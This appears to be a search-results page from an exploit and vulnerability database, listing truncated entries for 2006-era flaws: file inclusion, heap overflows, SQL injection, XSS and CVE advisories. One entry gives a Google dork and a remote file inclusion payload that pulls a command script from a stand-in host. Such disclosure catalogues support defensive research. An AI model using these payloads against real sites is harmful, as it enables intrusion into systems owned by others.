7009 matches found
phpBazar 2.1.0 - Remote File Inclusion Authentication Bypass
phpBazar 2.1.0 - Remote File Inclusion Authentication Bypass Title: phpBazar = 2.1.0 Multiple vulnerabilities URL: http://www.smartisoft.com/ Dork: inurl:classified.php phpbazar Exploits: -remote file inclusion: /classifiedright.php?languagedir=http://yourhost/cmd.gif?cmd=ls -access to admin login...
libextractor <= 0.5.13 Multiple Heap Overflow PoC Exploits
Exploit for multiple platform in category dos / poc libextractor <= 0.5.13 Multiple Heap Overflow PoC Exploits http://www.inj3ct0r.com/sploits/6149.zip 0day.today 2018-04-02...
libextractor <= 0.5.13 Multiple Heap Overflow PoC Exploits
No description provided by source. libextractor <= 0.5.13 Multiple Heap Overflow PoC Exploits http://www.milw0rm.com/sploits/05172006-libextho.zip milw0rm.com 2006-05-17...
libextractor 0.5.13 - Multiple Heap Overflows (PoC)
libextractor <= 0.5.13 Multiple Heap Overflow PoC Exploits https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/1801.zip 05172006-libextho.zip milw0rm.com 2006-05-17...
GLSA-200605-11 : Ruby: Denial of Service
The remote host is affected by the vulnerability described in GLSA-200605-11 Ruby: Denial of Service Ruby uses blocking sockets for WEBrick and XMLRPC servers. Impact : An attacker could send large amounts of data to an affected server to block the socket and thus deny other connections to the...
Mac OS X Multiple Vulnerabilities (Security Update 2006-003)
The remote host is running Apple Mac OS X, but lacks Security Update 2006-003. This security update contains fixes for the following applications: AppKit, ImageIO, BOM, CFNetwork, ClamAV (Mac OS X Server only), CoreFoundation, CoreGraphics, Finder, FTPServer, Flash Player, Keychain, LaunchServices, libcurl, Ma...
EImagePro - view.asp?Pic SQL Injection
EImagePro - view.asp?Pic SQL Injection source: https://www.securityfocus.com/bid/17911/info EImagePro is prone to multiple SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. Successful exploi...
Albinator 2.0.8 - 'dlisting.php?cid' Cross-Site Scripting
source: https://www.securityfocus.com/bid/17826/info Albinator is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input. An attacker may leverage these issues to have arbitrary script code executed in the browser of an...
OrbitHYIP 2.0 - signup.php?referral Cross-Site Scripting
OrbitHYIP 2.0 - signup.php?referral Cross-Site Scripting source: https://www.securityfocus.com/bid/17766/info OrbitHYIP is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. An attacker may leverag...
Invision Vulnerabilities, including remote code execution
Several Invision Flaws 2.1.5 and possibly earlier --------------------------------------------------- IceShaman & Wells HackThisSite.org 1 Code execution sources/actionpublic/search.php line 1261 $this-output = pregreplace "value="'$this-ipsclass-input'lastdate'"'i", "1 selected='selected'",...
linux/x86 xor-encoded Connect Back Shellcode 371 bytes
Exploit for linux/x86 platform in category shellcode linux/x86 xor-encoded Connect Back Shellcode 371 bytes linux/x86 xor-encoded Connect Back Shellcode 371 bytes...
Authentication flaw
Unspecified vulnerability in the POP service in MailEnable Standard Edition before 1.94, Professional Edition before 1.74, and Enterprise Edition before 1.22 has unknown attack vectors and impact related to "authentication exploits". NOTE: this is a different set of affected versions, and probabl...
CVE-2006-1792
Unspecified vulnerability in the POP service in MailEnable Standard Edition before 1.94, Professional Edition before 1.74, and Enterprise Edition before 1.22 has unknown attack vectors and impact related to "authentication exploits". NOTE: this is a different set of affected versions, and probabl...
CVE-2006-1792
CVE-2006-1792 pertains to MailEnable’s POP service with affected versions: Standard Edition before 1.94, Professional Edition before 1.74, and Enterprise Edition before 1.22. The vulnerability is described as unspecified with unknown attack vectors and impact related to “authentication exploits.”...
Ten ways to hack a SQL Server system - vulnerability warning - the black bar safety net
Whether by manual probing or with security testing tools, malicious attackers use a variety of tricks to compromise your SQL Server system from inside and outside your firewall. Since attackers do this, you also need to carry out the same attacks to test your system'...
PHPWebGallery Multiple Cross Site Scripting Vulnerabilities
Title : PHPWebGallery Multiple Cross Site Scripting Vulnerabilities Author: Mourad aka Psych0 root at linuxmail org Moroccan Security Team Vendor: www.phpwebgallery.net Software: PHPWebGallery Version: 1.4.1 category.php and picture.php scripts are vulnerable to XSS attacks. Exploits:...
Sire 2.0 Nws Remote File Inclusion & Arbitrary Files Upload
by Moroccan Security Team Greetz To All Friend +File Inclusion: Input passed to the "rub" parameter in "lire.php" isn't properly verified before it is used to include remote files. Successful exploitation requires that "register_globals" is enabled. lire.php code ? 73...
Security review of the new network domain name management system - exploits warning - the black bar safety net
It is well known that the new network's share of users in China's domain name registration industry is still very large. But I found that a safety hazard exists in the new network domain system. One day I logged in to the new network from the agent's domain Control Panel and accidentally...
New exploit by SpiderZ
Author: SpiderZ Exploit 01 phpBB 2.0.19 Topic infinitely exploit multiple topic http://spiderz.netsons.org/1.txt Exploit 02 Mini-Nuke v1.8 XSS http://spiderz.netsons.org/3.txt Exploit 03 CuteCast Version 1.2 multiple users http://spiderz.netsons.org/4.txt Exploit 04 IPB v1.x upload html .gif...
Mercur MailServer 5.0 SP3 - 'IMAP' Remote Buffer Overflow (1)
/ mercur.cpp Atrium Mercur IMAP 5.0 SP3 Messaging Multiple IMAP Commands Remote Exploit Copyright C 2006 Javaphile Group http://www.javaphile.org Exploits code by : pll Ellison.Tangatgmaildotcom Bug Reference: http://www.frsirt.com/bulletins/4332 / include include include include pragma commentli...